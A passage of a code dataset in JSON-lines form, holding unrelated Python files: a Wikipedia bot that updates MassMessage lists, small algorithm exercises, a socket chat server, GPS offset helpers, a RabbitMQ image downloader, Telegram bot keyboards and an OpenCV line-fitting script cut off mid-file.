options[key]\n if isinstance(value, datetime.date):\n pass\n elif isinstance(value, str):\n try:\n value = datetime.datetime.strptime(value, '%Y-%m-%d').date()\n except ValueError:\n pywikibot.error('Date format must be YYYY-MM-DD.')\n return False\n else:\n return False\n options[key] = value\n for key, value in options.items():\n pywikibot.log('-{} = {}'.format(key, value))\n if key in required_keys:\n has_keys.append(key)\n if key == 'config':\n if not isinstance(value, str):\n return False\n elif key in 'end_date' 'start_date':\n if not isinstance(value, datetime.date):\n return False\n if sorted(has_keys) != sorted(required_keys):\n return False\n return True\n\n\nclass UserGroupsMassMessageListUpdater(\n SingleSiteBot, NoRedirectPageBot, ExistingPageBot\n):\n \"\"\"Bot to update MassMessage lists.\"\"\"\n\n def __init__(self, generator, **kwargs):\n \"\"\"\n Constructor.\n\n @param generator: the page generator that determines on which\n pages to work\n @type generator: generator\n \"\"\"\n self.availableOptions.update(\n {\n 'config': dict(),\n 'group_changes': list(),\n 'renames': [\n {'olduser': None, 
'newuser': None, 'timestamp': None}\n ],\n }\n )\n self.generator = generator\n super().__init__(**kwargs)\n\n def check_disabled(self):\n \"\"\"Check if the task is disabled. If so, quit.\"\"\"\n if not self.site.logged_in():\n self.site.login()\n page = pywikibot.Page(\n self.site,\n 'User:{username}/shutoff/{class_name}.json'.format(\n username=self.site.user(), class_name=self.__class__.__name__\n ),\n )\n if page.exists():\n content = page.get(force=True).strip()\n if content:\n e = '{} disabled:\\n{}'.format(self.__class__.__name__, content)\n pywikibot.error(e)\n self.quit()\n\n def treat_page(self):\n \"\"\"Process one page.\"\"\"\n self.check_disabled()\n\n page_config = self.getOption('config')[self.current_page.title()]\n added_count = removed_count = renamed_count = 0\n page_json = json.loads(\n self.current_page.text, object_pairs_hook=OrderedDict\n )\n page_dict = {'>nonusers': set()}\n\n # Process the current targets.\n for item in page_json['targets']:\n page = pywikibot.Page(self.site, item['title'])\n if page.namespace().id not in (2, 3):\n page_dict['>nonusers'].add(page)\n continue\n base_page = pywikibot.Page(\n self.site, re.sub(r'^([^/]+).*', r'\\1', page.title())\n )\n if base_page.isTalkPage():\n user = pywikibot.User(base_page.toggleTalkPage())\n else:\n user = pywikibot.User(base_page)\n # Handle renames.\n for rename in self.getOption('renames'):\n if user != rename['olduser']:\n continue\n newuser = rename['newuser']\n newpage = pywikibot.Page(\n self.site,\n re.sub(\n r':{}\\b'.format(re.escape(user.title(with_ns=False))),\n ':{}'.format(newuser.title(with_ns=False)),\n page.title(),\n ),\n )\n pywikibot.log(\n '{} renamed to {} ({} to {})'.format(\n user.title(),\n newuser.title(),\n page.title(),\n newpage.title(),\n )\n )\n user = newuser\n page = newpage\n renamed_count += 1\n if page_config.get('required', None):\n if not page_config['group'] & set(user.groups()):\n pywikibot.log(\n 'Removed {}, not in required group'.format(\n user.title()\n )\n )\n removed_count += 1\n continue\n page_dict[user] = page\n\n # Handle group changes.\n for change in self.getOption('group_changes'):\n user = change['user']\n if (\n page_config.get('add', None)\n and (page_config['group'] & change['added'])\n and 'bot' not in user.groups()\n and user not in page_dict\n ):\n pywikibot.log('Added {}'.format(user.title()))\n page_dict[user] = user.toggleTalkPage()\n added_count += 1\n if page_config.get('remove', None) and (\n page_config['group'] & change['removed']\n ):\n if page_dict.pop(user, None):\n pywikibot.log('Removed {}'.format(user.title()))\n removed_count += 1\n\n # Build JSON and save.\n if added_count + removed_count + renamed_count > 0:\n new_pge_json = OrderedDict()\n new_pge_json['description'] = page_json['description']\n new_pge_json['targets'] = list()\n for page in sorted(\n page_dict.pop('>nonusers') | set(page_dict.values())\n ):\n new_pge_json['targets'].append({'title': page.title()})\n text = json.dumps(new_pge_json, ensure_ascii=False, indent=4)\n summary = 'Update MassMessage list: {} added, {} removed'.format(\n added_count, removed_count\n )\n if renamed_count > 0:\n summary += ', {} renamed'.format(renamed_count)\n self.put_current(text, summary=summary, minor=False)\n\n\ndef main(*args):\n \"\"\"\n Process command line arguments and invoke bot.\n\n @param args: command line arguments\n @type args: list of unicode\n \"\"\"\n options = {\n 'end_date': date.today() - timedelta(days=1),\n 'start_date': date.today() - timedelta(days=1),\n }\n # 
Process global arguments\n local_args = pywikibot.handle_args(args)\n site = pywikibot.Site()\n site.login()\n # Parse command line arguments\n for arg in local_args:\n arg, _, value = arg.partition(':')\n arg = arg[1:]\n if arg in ('config', 'end_date', 'start_date'):\n if not value:\n value = pywikibot.input(\n 'Please enter a value for {}'.format(arg), default=None\n )\n options[arg] = value\n else:\n options[arg] = True\n if not validate_options(options):\n pywikibot.bot.suggest_help(\n additional_text='The specified options are invalid.'\n )\n return False\n config = pywikibot.Page(site, options.pop('config'))\n config = get_json_from_page(config)\n if not validate_config(config, site):\n pywikibot.bot.suggest_help(\n additional_text='The specified configuration is invalid.'\n )\n return False\n options['config'] = config\n\n meta = pywikibot.Site('meta', 'meta')\n suffix = '@{}'.format(site.dbName())\n start = datetime.datetime.combine(options.pop('start_date'), time.min)\n end = datetime.datetime.combine(options.pop('end_date'), time.max)\n # Parse rename logs into a list of dict.\n if options.pop('rename', None):\n renames = list()\n if options.get('meta', None):\n rename_events = meta.logevents(\n logtype='gblrename', start=start, end=end, reverse=True\n )\n else:\n rename_events = site.logevents(\n logtype='renameuser', start=start, end=end, reverse=True\n )\n for rename in rename_events:\n try:\n renames.append(\n {\n 'olduser': pywikibot.User(\n site, rename.data['params']['olduser']\n ),\n 'newuser': pywikibot.User(\n site, rename.data['params']['newuser']\n ),\n 'timestamp': rename.timestamp(),\n }\n )\n except KeyError:\n continue\n options['renames'] = sorted(renames, key=itemgetter('timestamp'))\n\n # Parse rights logs into a list of dict.\n group_changes = list()\n rights_events = site.logevents(\n logtype='rights', start=start, end=end, reverse=True\n )\n if options.pop('meta', None):\n meta_rights_events = set()\n for log_event in meta.logevents(\n logtype='rights', start=start, end=end, reverse=True\n ):\n try:\n if log_event.page().title().endswith(suffix):\n meta_rights_events.add(log_event)\n except KeyError:\n continue\n rights_events = chain(rights_events, meta_rights_events)\n for log_event in rights_events:\n try:\n new_groups = set(log_event.newgroups)\n old_groups = set(log_event.oldgroups)\n group_changes.append(\n {\n 'user': pywikibot.User(\n site,\n re.sub(\n r'{}$'.format(suffix), '', log_event.page().title()\n ),\n ),\n 'added': new_groups - old_groups,\n 'removed': old_groups - new_groups,\n 'timestamp': log_event.timestamp(),\n }\n )\n except KeyError:\n continue\n options['group_changes'] = sorted(\n group_changes, key=itemgetter('timestamp')\n )\n\n # Generate pages and invoke the bot.\n gen = (\n config[key]['page'] for key in config.keys() if config[key]['enabled']\n )\n gen = PreloadingGenerator(gen)\n UserGroupsMassMessageListUpdater(gen, site=site, **options).run()\n return True\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"enwiki/massmessage_list_updater.py","file_name":"massmessage_list_updater.py","file_ext":"py","file_size_in_byte":13843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"573781410","text":"\"\"\"\nImplement an iterator to flatten a 2d vector.\n\nFor example,\nGiven 2d vector =\n\n[\n [1,2],\n [3],\n [4,5,6]\n]\nBy calling next repeatedly until hasNext returns false,\nthe order of elements returned by next should be: [1,2,3,4,5,6].\n\nHint:\n\nHow many 
variables do you need to keep track of?\nTwo variables are all you need. Try with x and y.\nBeware of empty rows. They could be the first few rows.\nTo write correct code, think about the invariant to maintain. What is it?\nThe invariant is that x and y must always point to a valid element in the 2d vector.\nShould you maintain your invariant ahead of time or right when you need it?\nNot sure? Think about how you would implement hasNext(). Which is more complex?\nCommon logic in two different places should be refactored into a common method.\n\n# Your Vector2D object will be instantiated and called as such:\n# i, v = Vector2D(vec2d), []\n# while i.hasNext(): v.append(i.next())\n\n\"\"\"\n\nimport collections\n\n\nclass Vector2D1(object):\n    \"\"\"\n    Solution using a queue to store a list of iterators; uses extra space\n    \"\"\"\n    def __init__(self, vec2d):\n        \"\"\"\n        Initialize your data structure here.\n        :type vec2d: List[List[int]]\n        \"\"\"\n        self.listIt = collections.deque()\n        for li in vec2d:\n            if li and len(li) > 0:\n                self.listIt.append([len(li), iter(li)])\n\n    def next(self):\n        \"\"\"\n        :rtype: int\n        \"\"\"\n        if self.listIt:\n            self.listIt[0][0] -= 1\n            return next(self.listIt[0][1])\n\n    def hasNext(self):\n        \"\"\"\n        :rtype: bool\n        \"\"\"\n        while self.listIt and self.listIt[0][0] == 0:\n            self.listIt.popleft()\n        return len(self.listIt) > 0\n\n\nclass Vector2D(object):\n\n    def __init__(self, vec2d):\n        \"\"\"\n        Initialize your data structure here.\n        :type vec2d: List[List[int]]\n        \"\"\"\n        self.listIt = None if not vec2d else [len(vec2d), iter(vec2d)]\n        self.numIt = None\n\n    def next(self):\n        \"\"\"\n        :rtype: int\n        \"\"\"\n        self.numIt[0] -= 1\n        return next(self.numIt[1])\n\n    def hasNext(self):\n        \"\"\"\n        :rtype: bool\n        \"\"\"\n        if not self.listIt:\n            return False\n        while self.listIt[0] > 0 and (not self.numIt or self.numIt[0] == 0):\n            self.listIt[0] -= 1\n            nextList = next(self.listIt[1])\n            if not nextList:\n                continue\n            self.numIt = [len(nextList), iter(nextList)]\n\n        return self.numIt is not None and self.numIt[0] > 0\n","sub_path":"medium/Flatten2DVector.py","file_name":"Flatten2DVector.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
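# Usage sketch for the Vector2D iterator above (mirrors the commented driver in
# the original docstring; the variable names are illustrative):
#
# vec2d = [[1, 2], [3], [4, 5, 6]]
# i, v = Vector2D(vec2d), []
# while i.hasNext():
#     v.append(i.next())
# # v == [1, 2, 3, 4, 5, 6]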
+{"seq_id":"212530275","text":"from tkinter import *\nimport socket\nimport time\nimport threading\nimport fenetre as FEN\nfrom time import gmtime,strftime\n\n\n### \"global\" variables section\nglobal combo\nglobal entree\n\nglobal sock\nglobal socketFils\n\n\nglobal Discution\nglobal currentConv\nglobal interface\n\n\ncurrentConv = []\nsocketFils = {}\ncurrentsocket = None\nDiscution = {}\ncurrentDiscution = \"\"\n\nfenetre = Tk()\n\nport = 15555\nexitFlag = True\nn = 0\n\n\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.bind(('', port ))\n\ndef callback():\n    global socketFils\n    \n    if sock is not None:\n        sock.close()\n    #TODO close all clients.\n    for client in socketFils:\n        if socketFils[client] != None:\n            deco(socketFils[client], client, True)\n    fenetre.destroy()\n\n\ndef deco(_sock, _name, _by_serv):\n    global socketFils\n\n    print (\"closing \" + format(_name))\n    \n    if _by_serv :\n        envoie(\"serveur shutdown\", _sock)\n\n    _sock.close()\n    socketFils[_name]=None\n\ndef getting (_name): ## get conv\n    global Discution\n\n    return Discution[_name]\n\ndef adding(_name, _sock): ## add conv \n    global socketFils\n    global Discution\n    \n    interface.add(_name) \n    Discution[_name] = []\n    socketFils[_name]=_sock\n\ndef subbing(_name):## sub conv\n    global Discution\n    del Discution[_name]\n\ndef addLigneConv(_name, txt):\n    if currentDiscution == _name:\n        interface.addaffiche(txt)\n    Discution[_name].append(txt)\n\ndef onselect(evt):\n    global currentDiscution\n    global currentsocket\n    global socketFils\n\n    interface.clean() \n    w = evt.widget 
\n    index = int(w.curselection()[0])\n    value = w.get(index)\n\n    currentDiscution = value\n    currentsocket = socketFils[value]\n\n    print ('You selected item %d: \"%s\"' % (index, value))\n    interface.affiche(getting(value))\n\ndef envoie(_inp, _sock):\n    global currentsocket\n\n    snd = (strftime(\"%H.%M.%S\", gmtime()) + \": \" + _inp)\n    try:\n        _sock.send(str.encode(snd))\n        addLigneConv(_sock, snd)\n\n    except:\n        print(\"error: connection lost (Error 1)\")\n\ndef envoyer():\n    try:\n        envoie(interface.saisi.get(), currentDiscution)\n        interface.saisi.delete(0, END)\n    except:\n        pass\n\n### multithreading section\n# # # thread that talks to one client\nclass myThreadEcouteClient (threading.Thread):\n    def __init__(self, _threadclient, _threadAdress, _nb):\n        threading.Thread.__init__(self)\n        self.threadclient = _threadclient\n        self.threadAdress = _threadAdress\n        self.nb = _nb\n        print (\"{} connected\".format(self.threadAdress))\n        adding(format(self.threadAdress), self.threadclient)\n    \n\n    def run(self):\n        closeFlag = True\n\n        while closeFlag:\n            try:\n                response = self.threadclient.recv(255)\n\n                if response.decode()[10:] != \"\":\n                    if (response.decode())[10:] == \"connextion closed by client\":\n                        closeFlag = False\n                        deco(self.threadclient, self.threadAdress, False)\n                    else:\n                        print (response.decode())\n                        addLigneConv(format(self.threadAdress), response.decode())\n\n            except Exception as inst :\n                print(inst)\n                print('error: connection lost (Error 2)')\n                closeFlag = False\n                deco(self.threadclient, self.threadAdress, False)\n\n        print (format(self.threadAdress) + \" closed\")\n    \n# # # thread that loops to accept incoming connections\nclass myThreadMainBoucleCO (threading.Thread): \n    def __init__(self):\n        threading.Thread.__init__(self)\n\n    def run(self):\n        global n\n        global socketFils\n\n        exitFlag = True\n        while exitFlag:\n            try:\n                sock.listen(5)\n                client, address = sock.accept()\n                newthread = myThreadEcouteClient(client, address, n)\n                newthread.start() \n            except Exception as inst :\n                print(inst)\n                print('error: connection lost (Error 3)')\n                exitFlag = False\n\n        print (\"Close\")\n\n# Create new threads\nthread1 = myThreadMainBoucleCO()\n# Start new Threads\nthread1.start()\n\ntry:\n    interface = FEN.Interface(fenetre)\n    interface.liste.bind('<<ListboxSelect>>', onselect)\n    interface.valider.configure(command=envoyer)\n    interface.mainloop()\nexcept Exception as inst :\n    print(inst)\n\ncallback()\nprint(\"this is the End folk\")","sub_path":"serveur.py","file_name":"serveur.py","file_ext":"py","file_size_in_byte":4336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"525098117","text":"# defining a class\nclass Employee:\n    no_of_leaves = 8\n\n    # Constructor\n    def __init__(self, obj_name, obj_salary, obj_age):\n        self.name = obj_name\n        self.salary = obj_salary\n        self.age = obj_age\n\n    # action method\n    def print_details(self):\n        return f'The name is: {self.name}\\nSalary: {self.salary}\\nAge is: {self.age}'\n\n    # this class method can change class variables accessed by objects and instances\n    @classmethod\n    def change_leaves(cls, newleaves):\n        cls.no_of_leaves = newleaves\n\n\n# Creating objects of employee class\nanindo = Employee('Anindo Dey', 50000, 25)\nharry = Employee('Harry Potter', 45000, 
24)\n\nprint(\"Class variables:\", harry.no_of_leaves)\n\nharry.change_leaves(100)\nprint(\"Change after class variables:\", harry.no_of_leaves)","sub_path":"oops - class methods.py","file_name":"oops - class methods.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"7361299","text":"# -*- coding: utf-8 -*-\nfrom benchpress import util\nimport numpy as np\n\ndef main():\n B = util.Benchmark()\n\n k = B.size[0] # number of plane waves\n stripes = B.size[1] # number of stripes per wave\n N = B.size[2] # image size in pixels\n ite = B.size[3] # iterations\n\n phases = np.arange(0, 2*np.pi, 2*np.pi/ite)\n image = np.empty((N, N), dtype=B.dtype)\n d = np.arange(-N/2, N/2, dtype=B.dtype)\n\n xv, yv = np.meshgrid(d, d)\n theta = np.arctan2(yv, xv)\n r = np.log(np.sqrt(xv*xv + yv*yv))\n r[np.isinf(r) == True] = 0\n\n tcos = theta * np.cos(np.arange(0, np.pi, np.pi/k))[:, np.newaxis, np.newaxis]\n rsin = r * np.sin(np.arange(0, np.pi, np.pi/k))[:, np.newaxis, np.newaxis]\n inner = (tcos - rsin) * stripes\n\n cinner = np.cos(inner)\n sinner = np.sin(inner)\n\n B.start()\n\n for phase in phases:\n image[:] = np.sum(cinner * np.cos(phase) - sinner * np.sin(phase), axis=0) + k\n util.Benchmark().flush()\n\n B.stop()\n B.pprint()\n\n if B.outputfn:\n B.tofile(B.outputfn, {'res': image})\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"benchpress/benchmarks/quasicrystal/python_numpy/quasicrystal.py","file_name":"quasicrystal.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"488006219","text":"\"\"\"Defines classes used to read and handle GPS data\"\"\"\nimport math\nimport pynmea2\nimport serial\n\n\nEARTH_RADIUS = 6371001.0 # Average radius of spherical earth in meters\n\n\ndef get_location_offset(origin, north_offset, east_offset):\n \"\"\"\n Returns a GpsReading with calculated GPS latitude and longitude coordinates given a\n north and east offset in meters from original GPS coordinates. Note that\n an x offset corresponds to an east offset and a y offset corresponds to a north offset.\n For the new reading, the same altitude as the original GpsReading is kept and\n a null timestamp is used.\n\n Sources:\n https://github.com/dronekit/dronekit-python/blob/master/examples/mission_basic/mission_basic.py\n http://gis.stackexchange.com/questions/2951/algorithm-for-offsetting-a-latitude-longitude-by-some-amount-of-meters\n \"\"\"\n\n # Offsets coordinates in radians\n lat_offset = north_offset / EARTH_RADIUS\n lon_offset = east_offset / (EARTH_RADIUS*math.cos(math.pi*origin.latitude/180))\n\n # New position in decimal degrees\n new_lat = origin.latitude + (lat_offset * 180/math.pi)\n new_lon = origin.longitude + (lon_offset * 180/math.pi)\n return GpsReading(new_lat, new_lon, origin.altitude, 0)\n\n\ndef get_relative_from_location(origin, point):\n \"\"\"\n Returns the relative (x, y) values in meters of the GpsReading point based\n on the origin GpsReading (which is considered (0,0)). 
The inverse of\n    get_location_offset.\n    \"\"\"\n    lon_offset = (point.longitude - origin.longitude) * (math.pi / 180)\n    lat_offset = (point.latitude - origin.latitude) * (math.pi / 180)\n    x = lon_offset * (EARTH_RADIUS*math.cos(math.pi*origin.latitude/180))\n    y = lat_offset * EARTH_RADIUS\n    return (x, y)\n\n\ndef get_distance(reading_1, reading_2):\n    \"\"\"\n    Returns distance in meters between two GpsReadings.\n    The latitude is fairly accurate in this calculation\n    but the longitude is off.\n\n    Source:\n    https://github.com/dronekit/dronekit-python/blob/master/examples/mission_basic/mission_basic.py\n    \"\"\"\n    lat_diff = reading_1.latitude - reading_2.latitude\n    lon_diff = reading_1.longitude - reading_2.longitude\n    return math.sqrt((lat_diff*lat_diff) + (lon_diff*lon_diff)) * 1.113195e5\n\n\nclass GpsReadError(Exception):\n    \"\"\"Error for invalid gps reading\"\"\"\n    def __init__(self, message, data):\n        super(GpsReadError, self).__init__((message, data))\n\n\nclass GpsReading:\n    \"\"\"A data class for GPS reading attributes\"\"\"\n    def __init__(self, latitude, longitude, altitude, time):\n        self.latitude = latitude\n        self.longitude = longitude\n        self.altitude = altitude\n        self.time = time\n\n    def __repr__(self):\n        \"\"\"Returns representation of GPS reading\"\"\"\n        return '{}({}, {}, {}, {})'.format(self.__class__.__name__,\n                                           self.latitude, self.longitude,\n                                           self.altitude, self.time)\n\n    def __eq__(self, other):\n        \"\"\"Compares if two GpsReadings are equal\"\"\"\n        return (self.latitude == other.latitude and\n                self.longitude == other.longitude and\n                self.altitude == other.altitude and\n                self.time == other.time)\n\n\nclass Gps:\n    \"\"\"A class for gathering GPS data via serial\"\"\"\n    def __init__(self, port, baudrate):\n        self.ser = serial.Serial(port, baudrate, timeout=1)\n\n    def __repr__(self):\n        \"\"\"Returns representation of GPS\"\"\"\n        return '{}({})'.format(self.__class__.__name__, self.ser)\n\n    def read(self):\n        \"\"\"Returns a GpsReading object with the values supplied\"\"\"\n        msg = None\n        max_tries = 4\n        for attempt in range(1, max_tries + 1):\n            try:\n                while not isinstance(msg, pynmea2.GGA):\n                    # readline() returns bytes; pynmea2 expects text\n                    msg = pynmea2.parse(self.ser.readline().decode('ascii', errors='replace'))\n            except pynmea2.ParseError:\n                if attempt == max_tries:\n                    raise GpsReadError('max number of parse attempts reached', attempt)\n                else:\n                    pass\n            else:\n                break\n        return GpsReading(msg.latitude, msg.longitude, msg.altitude,\n                          msg.timestamp)\n","sub_path":"control/gps.py","file_name":"gps.py","file_ext":"py","file_size_in_byte":4221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
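# Round-trip sketch for the GPS helpers above (the coordinates are made up; an
# origin near the equator is used so the simplified distance formula stays close):
#
# origin = GpsReading(0.0, 10.0, 100.0, 0)
# moved = get_location_offset(origin, north_offset=100.0, east_offset=50.0)
# x, y = get_relative_from_location(origin, moved)
# # x ~= 50.0 (east) and y ~= 100.0 (north), up to the spherical-earth approximation
# print(get_distance(origin, moved))  # roughly sqrt(100**2 + 50**2) meters here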
+{"seq_id":"408763827","text":"import pika\nimport hashlib\nfrom retry import retry\nimport requests\n\ncredentials = pika.PlainCredentials('guest1', 'guest1')\nconnection = pika.BlockingConnection(pika.ConnectionParameters(\n    '192.168.10.190', 5672, '/', credentials))\n\nchannel = connection.channel()\nchannel.queue_declare(queue='img_url_test')\n\n\nclass Download_image:\n    @retry(tries=3)\n    def request_(self, img, md5_url):\n        response = requests.get(img)\n        if response.status_code == 200:\n            with open('image/{0}.png'.format(md5_url), 'wb') as f:\n                f.write(response.content)\n                print('1')\n        else:\n            print('bad url:', img)\n\n    def callback(self, ch, method, properties, body):\n        img = body.decode()\n        m1 = hashlib.md5()\n        m1.update(img.encode('utf-8'))\n        md5_url = m1.hexdigest()\n        try:\n            self.request_(img, md5_url)\n        except Exception as e:\n            print(e)\n        ch.basic_ack(delivery_tag=method.delivery_tag)\n\n    def consume_start(self):\n        channel.basic_qos(prefetch_count=1)\n        channel.basic_consume(self.callback,\n                              queue='img_url_test')\n        channel.start_consuming()\n\n\nif __name__ == '__main__':\n    d = Download_image()\n    d.consume_start()\n","sub_path":"hilder_other/community_image/download_image.py","file_name":"download_image.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"365969588","text":"from django.conf.urls import url\n\nfrom . import views\n\napp_name = 'gdv'\nurlpatterns = [\n\t\turl(r'^$', views.index, name = 'index'),\n\t\turl(r'^main/', views.main, name = 'main'),\n\t\turl(r'^coordinates/', views.show_coordinates, name = 'coordinates'),\n\t\turl(r'^get_coords/', views.get_coordinates, name = 'get_coordinates'),\n\t]","sub_path":"mysite/gdv/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"173058295","text":"# file read/write\nf=open('fib.py','r')\nprint(f.read())\nf.close()\n# use with to close the file automatically\nwith open('fib.py','r') as f:\n    print(f.read())\n# open a binary file\n#f=open('jiaren.png','rb')\n#print(f.read())\n#f.close()\n# write to a file\nwf=open('write_test.txt','w')\nwf.write('study is ...')\nwf.close()\n# write to a file using with\nwith open('write_test1.txt','w') as wf:\n    wf.write('all is well')\n","sub_path":"PythonFiles/fileio.py","file_name":"fileio.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"538327259","text":"import sys\nsys.stdin = open('input.txt','r')\n\nN = int(input())\nP = int(input())\nnod = {}\nfor a in range(1,N+1):\n    nod[a] = []\nfor _ in range(P):\n    a, i = map(int,input().split())\n    nod[a].append(i)\n    nod[i].append(a)\n\n# print(nod)\n\ndef DFS():\n    visit = [0]*(N+1)\n    q, cur = [1], 1\n    visit[1] = 1\n    while q :\n        if sum(visit) >= N :\n            break\n        for next in nod[cur]:\n            if not visit[next]:\n                visit[next] = 1\n                q.append(cur)\n                q.append(next)\n                cur = next\n                break\n        cur = q.pop()\n    # print(visit)\n    # print(q)\n    print(sum(visit)-1)\n\nDFS()","sub_path":"ForNovTest/BeakJoon/2606.py","file_name":"2606.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"371876072","text":"from datetime import datetime\n\nfrom aiogram import types\n\nimport consts\nimport bot_utils\n\n\ndef _callback(*args):\n    return '-|-'.join([str(i) for i in args])\n\n\nbtn = {\n    'order': '📝Заказать песню',\n    'what_playing': '🎧Что играет?',\n    'help': '⁉️Помощь',\n    'feedback': '🖌Обратная связь',\n}\n\n\norder_inline = types.InlineKeyboardMarkup()\norder_inline.add(types.InlineKeyboardButton(\"Удобный поиск\", switch_inline_query_current_chat=\"\"))\n\nstart = types.ReplyKeyboardMarkup(row_width=2, resize_keyboard=True)\nstart.add(types.KeyboardButton(btn['what_playing']), types.KeyboardButton(btn['order']))\nstart.add(types.KeyboardButton(btn['feedback']), types.KeyboardButton(btn['help']))\n\nwhat_playing = types.InlineKeyboardMarkup(row_width=2)\nwhat_playing.add(types.InlineKeyboardButton(text='История', url='https://t.me/rkpi_music'))\nwhat_playing.add(types.InlineKeyboardButton(text='Предыдущие треки', callback_data='song_prev'),\n                 types.InlineKeyboardButton(text='Следующие треки', callback_data='song_next'))\n\nchoice_help = types.InlineKeyboardMarkup(row_width=1)\nfor k, v in consts.helps['btns'].items():\n    
choice_help.add(types.InlineKeyboardButton(text=v, callback_data=_callback('help', k)))\n\n\nasync def choice_day() -> types.InlineKeyboardMarkup:\n day = datetime.today().weekday()\n bn = bot_utils.get_break_num()\n keyboard = types.InlineKeyboardMarkup(row_width=1)\n btns = []\n\n if bn is not False and (await bot_utils.order_time_left(day, bn)) != 0: # кнопка сейчас если эфир+успевает\n btns.append(types.InlineKeyboardButton(\n text=consts.times_name['next_days'][3],\n callback_data=_callback('order_time', day, bn)\n ))\n if datetime.now().hour < 22: # кнопка сегодня\n btns.append(types.InlineKeyboardButton(\n text=consts.times_name['next_days'][0],\n callback_data=_callback('order_day', day)\n ))\n for i in range(1, 3): # завтра (1), послезавтра (2)\n btns.append(types.InlineKeyboardButton(\n text=consts.times_name['next_days'][i],\n callback_data=_callback('order_day', (day + i) % 7)\n ))\n btns.append(types.InlineKeyboardButton(text='Отмена', callback_data='order_cancel'))\n keyboard.add(*btns)\n return keyboard\n\n\nasync def choice_time(day: int, attempts: int = 5) -> types.InlineKeyboardMarkup:\n\n async def get_btn(time_: int) -> types.InlineKeyboardButton:\n free_mins = await bot_utils.order_time_left(day, time_)\n if free_mins == 0 and attempts > 0:\n return types.InlineKeyboardButton(\n text='❌' + bot_utils.get_break_name(time_),\n callback_data=_callback('order_notime', day, attempts)\n )\n return types.InlineKeyboardButton(\n text=('⚠' if free_mins < 5 else '') + bot_utils.get_break_name(time_),\n callback_data=_callback('order_time', day, time_)\n )\n\n today = day == datetime.today().weekday()\n time = datetime.now().hour * 60 + datetime.now().minute\n times = consts.broadcast_times_[day]\n\n keyboard = types.InlineKeyboardMarkup(row_width=2)\n btns = []\n\n for num, (_, break_finish) in times.items():\n if today and time > break_finish: # если сегодня и перерыв прошел - не добавляем кнопку\n continue\n btns.append(await get_btn(num))\n\n btns.append(types.InlineKeyboardButton(text='Назад', callback_data='order_back_day'))\n keyboard.add(*btns)\n return keyboard\n\n\ndef admin_choose(day: int, time: int) -> types.InlineKeyboardMarkup:\n return types.InlineKeyboardMarkup().add(\n types.InlineKeyboardButton(\n text='✅Принять',\n callback_data=_callback('admin_choice', day, time, 'queue')\n ),\n types.InlineKeyboardButton(\n text='Без очереди',\n callback_data=_callback('admin_choice', day, time, 'now')\n ),\n types.InlineKeyboardButton(\n text='❌Отклонить',\n callback_data=_callback('admin_choice', day, time, 'reject')\n )\n )\n\n\ndef admin_unchoose(day: int, time: int, status: str) -> types.InlineKeyboardMarkup:\n return types.InlineKeyboardMarkup().add(types.InlineKeyboardButton(\n text='Отмена',\n callback_data=_callback('admin_unchoice', day, time, status)\n ))\n","sub_path":"kpi_radio_bot/keyboards.py","file_name":"keyboards.py","file_ext":"py","file_size_in_byte":4592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"166996341","text":"\n'''\nPython lesson: all()\nthe all() method returns True when all elements in the given iterable are true. If not, \nit returns False. \nDictionary: if alll the keys are true or dict is empty \n0 == False\n'0' == True\n\nany()\nthe any method returns True if there is any elements in the given iterable are true. 
\n\n'''\n\nclass Solution(object):\n def setZeroes(self, matrix):\n m = len(matrix)\n n = len(matrix[0])\n firstRowHasZero = not all(matrix[0])\n \n #Use first row/column as marker, scan the matrix \n for i in xrange(1,m):\n for j in xrange(n):\n if matrix[i][j] == 0:\n matrix[0][j] = matrix[i][0] = 0\n \n\n #Set the zeros\n for i in xrange(1, m):\n #start, stop, step\n for j in xrange(n-1, -1, -1):\n # first row or first column has been marked \n print(matrix[i][0])\n print(matrix[0][j])\n if matrix[i][0] == 0 or matrix[0][j] == 0:\n matrix[i][j] = 0\n\n #Set the zeros for the first row\n if firstRowHasZero:\n matrix[0] = [0] * n \n \n\n#test case\n[[0],[1]] \nx = Solution().setZeroes([[0],[1]])\nprint(x)\n\n\n\n\n","sub_path":"set_matrix_zeroes.py","file_name":"set_matrix_zeroes.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"567139069","text":"import numpy as np\nimport cv2\nfrom numpy.linalg import svd\n\n\nevents = [i for i in dir(cv2) if 'EVENT' in i]\nclick = False\nx1, y1 = -1, -1\n\n\ndef draw_rectangle(event, x, y, flags, param):\n global x1, y1, click, ptlst,dot_num,end # 전역변수 사용\n if event == cv2.EVENT_LBUTTONDOWN: # 마우스를 누른 상태\n click = True\n x1, y1 = x, y\n ptlst.append([x1,y1])\n if len(ptlst) == 5:\n n=5\n pts= np.array(ptlst)\n print(pts.shape)\n\n f = []\n y = []\n for i in range(5):\n f.append([\n np.array(pts[i, 0]),\n np.array(1)\n ])\n y.append([\n np.array(pts[i, 1])\n ])\n A=np.stack(f)\n Y = np.stack(y)\n F = np.linalg.pinv(A)\n\n [a, b] = (F @ Y)\n Start = [0, a[0] * 0 + b[0]]\n End = [1000, a[0] * 